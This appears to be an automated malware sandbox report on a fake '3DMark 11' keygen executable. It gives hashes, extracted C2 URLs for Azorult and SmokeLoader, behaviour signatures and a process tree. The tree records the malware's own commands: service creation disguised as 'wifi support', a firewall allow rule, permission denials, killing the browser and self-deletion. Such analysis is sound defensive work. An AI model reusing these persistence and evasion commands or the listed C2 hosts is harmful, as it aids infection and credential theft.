Overview

overview

10

Static

static

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

8

Resubmissions

03-07-2024 16:04

240703-thygmaycpc 10

01-07-2024 18:12

240701-ws6xvswbkj 10

01-07-2024 18:03

240701-wm5sls1gka 10

01-07-2024 18:03

240701-wm39sa1gjf 10

01-07-2024 18:03

240701-wm2e7avhkj 10

01-07-2024 18:03

240701-wmzxcs1fre 10

01-07-2024 18:02

240701-wmzats1frc 10

01-07-2024 18:02

240701-wmvbwa1fqh 10

22-11-2023 17:02

231122-vkac9adg64 10

Analysis

  • max time kernel
    452s
  • max time network
    471s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-11-2020 13:14

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    3DMark 11 Advanced Edition.exe

  • Size

    11.6MB

  • MD5

    236d7524027dbce337c671906c9fe10b

  • SHA1

    7d345aa201b50273176ae0ec7324739d882da32e

  • SHA256

    400b64f8c61623ead9f579b99735b1b0d9febe7c829e8bdafc9b3a3269bbe21c

  • SHA512

    e5c2f87923b3331719261101b2f606298fb66442e56a49708199d8472c1ac4a72130612d3a9c344310f36fcb3cf39e4637f7dd8fb3841c61b01b95bb3794610a

Score
10/10
agentteslaazorultplugxredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistencespywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://vintrsi.com/upload/

http://woatdert.com/upload/

http://waruse.com/upload/
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • AgentTesla Payload 2 IoCs
    keyloggerstealer
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 50 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 2 IoCs

    Office document equipped with 4.0 macros.

    macro
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 21 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • JavaScript code in executable 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 166 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 117 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 279 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4316 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 251 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 292 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe
    "C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4768
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        3⤵
        • Executes dropped EXE
        PID:840
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4572
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3076
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:1340
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
          keygen-step-2.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              5⤵
              • Runs ping.exe
              PID:1064
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4492
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:4596
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4592
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:4708
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2712
            • C:\Users\Admin\AppData\Local\Temp\sibCFE.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibCFE.tmp\0\setup.exe" -s
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4700
              • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
                "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Modifies system certificate store
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4796
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  7⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1496
                • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                  C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp1
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of SetThreadContext
                  • Checks SCSI registry key(s)
                  • Suspicious use of SetWindowsHookEx
                  PID:4204
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:3904
                  • C:\Users\Admin\AppData\Roaming\1605792066945.exe
                    "C:\Users\Admin\AppData\Roaming\1605792066945.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792066945.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4520
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:832
                  • C:\Users\Admin\AppData\Roaming\1605792071680.exe
                    "C:\Users\Admin\AppData\Roaming\1605792071680.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792071680.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4736
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:4620
                  • C:\Users\Admin\AppData\Roaming\1605792077227.exe
                    "C:\Users\Admin\AppData\Roaming\1605792077227.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792077227.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:3996
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:200
                  • C:\Users\Admin\AppData\Roaming\1605792079789.exe
                    "C:\Users\Admin\AppData\Roaming\1605792079789.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792079789.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:2632
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:4512
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetWindowsHookEx
                    PID:4680
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:3448
                    • C:\Users\Admin\AppData\Local\Temp\is-3D28B.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-3D28B.tmp\1021C014A4C9A552.tmp" /SL5="$A003A,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:4836
                      • C:\Program Files (x86)\RearRips\seed.sfx.exe
                        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        PID:5044
                        • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                          "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:1780
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
                        10⤵
                        • Checks computer location settings
                        PID:5028
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                    8⤵
                      PID:3080
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        9⤵
                        • Runs ping.exe
                        PID:4372
                  • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                    C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Checks SCSI registry key(s)
                    • Suspicious use of SetWindowsHookEx
                    PID:3844
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      8⤵
                        PID:3488
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          9⤵
                          • Kills process with taskkill
                          PID:2200
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                        8⤵
                          PID:4536
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            9⤵
                            • Runs ping.exe
                            PID:380
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                        7⤵
                          PID:4380
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:1180
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3608
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:4812
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                        PID:4352
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          6⤵
                          • Kills process with taskkill
                          PID:3824
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
                      4⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1920
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        PID:2312
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:224
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                1⤵
                • Enumerates connected drives
                • Modifies service
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5004
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 530F94F2AEC4E9E48BA0843F3A1BAA70 C
                  2⤵
                  • Loads dropped DLL
                  PID:3604
                • C:\Windows\system32\srtasks.exe
                  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                  2⤵
                  • Modifies service
                  PID:4908
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Modifies service
                PID:1748
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:4500
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:2420
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:3412
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:3444
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:4052
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                1⤵
                • Checks SCSI registry key(s)
                • Modifies data under HKEY_USERS
                PID:1552
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:4880
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:844
              • C:\Windows\system32\compattelrunner.exe
                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                1⤵
                  PID:4980
                • C:\Users\Admin\AppData\Local\Temp\4A74.exe
                  C:\Users\Admin\AppData\Local\Temp\4A74.exe
                  1⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:3648
                  • C:\Windows\SysWOW64\icacls.exe
                    icacls "C:\Users\Admin\AppData\Local\b9de1a2d-7e5c-4d47-9e2c-1fe04b10d298" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    2⤵
                    • Modifies file permissions
                    PID:1712
                  • C:\Users\Admin\AppData\Local\Temp\4A74.exe
                    "C:\Users\Admin\AppData\Local\Temp\4A74.exe" --Admin IsNotAutoStart IsNotTask
                    2⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:2008
                    • C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin1.exe
                      "C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin1.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:2252
                      • C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin1.exe
                        "C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin1.exe" --Admin
                        4⤵
                        • Executes dropped EXE
                        PID:1716
                    • C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin2.exe
                      "C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\updatewin2.exe"
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      PID:3640
                    • C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\5.exe
                      "C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\5.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:1184
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\c8ae442b-eb17-448e-8abc-cdc5e04f06e2\5.exe & exit
                        4⤵
                          PID:1196
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im 5.exe /f
                            5⤵
                            • Kills process with taskkill
                            PID:4992
                  • C:\Users\Admin\AppData\Local\Temp\4B9E.exe
                    C:\Users\Admin\AppData\Local\Temp\4B9E.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:3200
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im 4B9E.exe /f & erase C:\Users\Admin\AppData\Local\Temp\4B9E.exe & exit
                      2⤵
                        PID:2528
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im 4B9E.exe /f
                          3⤵
                          • Kills process with taskkill
                          PID:1804
                    • C:\Users\Admin\AppData\Local\Temp\4E7D.exe
                      C:\Users\Admin\AppData\Local\Temp\4E7D.exe
                      1⤵
                      • Executes dropped EXE
                      PID:3100
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vnalonll\
                        2⤵
                          PID:196
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bdyexku.exe" C:\Windows\SysWOW64\vnalonll\
                          2⤵
                            PID:4640
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" create vnalonll binPath= "C:\Windows\SysWOW64\vnalonll\bdyexku.exe /d\"C:\Users\Admin\AppData\Local\Temp\4E7D.exe\"" type= own start= auto DisplayName= "wifi support"
                            2⤵
                              PID:992
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" description vnalonll "wifi internet conection"
                              2⤵
                                PID:4576
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" start vnalonll
                                2⤵
                                  PID:2848
                                • C:\Windows\SysWOW64\netsh.exe
                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                  2⤵
                                    PID:3872
                                • C:\Users\Admin\AppData\Local\Temp\519B.exe
                                  C:\Users\Admin\AppData\Local\Temp\519B.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:4216
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\519B.exe
                                    2⤵
                                      PID:1812
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 3
                                        3⤵
                                        • Delays execution with timeout.exe
                                        PID:1004
                                  • C:\Users\Admin\AppData\Local\Temp\611D.exe
                                    C:\Users\Admin\AppData\Local\Temp\611D.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:316
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""
                                      2⤵
                                        PID:1684
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          3⤵
                                          • Runs ping.exe
                                          PID:4720
                                    • C:\Users\Admin\AppData\Local\Temp\71E7.exe
                                      C:\Users\Admin\AppData\Local\Temp\71E7.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
